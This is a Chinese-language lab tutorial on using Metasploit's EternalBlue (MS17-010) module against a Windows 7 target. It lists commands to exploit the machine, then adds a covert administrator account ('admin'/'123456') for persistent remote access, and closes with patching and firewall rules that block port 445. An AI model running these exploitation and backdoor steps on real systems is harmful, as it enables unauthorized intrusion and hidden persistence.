利用永恆之藍滲透win7 (低配版)


利用永恆之藍滲透win7 (低配版)

環境:

攻擊機: kali linux2.0系統

https://www.kali.org/downloads/)

 機: window7(鏈接:http://pan.baidu.com/s/1jIzOqRc 密碼:vz8p)

window server 2008

 洞:永恆之藍

步驟:

(這里實際操作時,我會用ssh遠程連接kali 操作,ssh的使用就不介紹了,自己搜)

 

第一步:打開metasploit

命令:root@kali:~# msfconsole

 

第二步:

使用永恆之藍模塊,

命令:

root@kali:~# search ms17-01

root@kali:~# use

 

 

第三步:

填充各種指令,主要是靶機IP,其中445端口已經默認了,其他不用改

命令:

root@kali:~# show options

root@kali:~# set RHOST 172.19.120.68

 

 

第四步:

攻擊

命令:

root@kali:~# exploit       或者run

 

 

 

顯示以及拿到靶機的控制權,

 

第五步:

創建新用戶,偷偷的控制使用,

命令:

net user admin 123456 /add

 

第六步:

提權,將新創建的用戶admin提到管理員權限

命令:

net localgroup administrators admin /add

 

 

查看權限:

net user admin

 

第六步:

遠程連接 admin 用戶

 

 

 

 

 

滲透成功,接下來你就可以做你想做的了。

 

防御辦法:

1,網上下載補丁,

2,關閉445端口,dos命令:

netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block

netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445

檢測445端口是否開啟:

netstat -ano -p tcp | find “445”

 

 

總結:

實驗過程遇到好多問題,解決辦法:先自己各種嘗試,在上網搜相關知識,最后還不會,就去請教大神。

另外這個實驗比較簡單,局限性較大,可以作為入門使用,網上好像有永恆之藍漏洞的復現,使用python 來做的,暫時還不太懂,等有機會自己也去嘗試嘗試。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM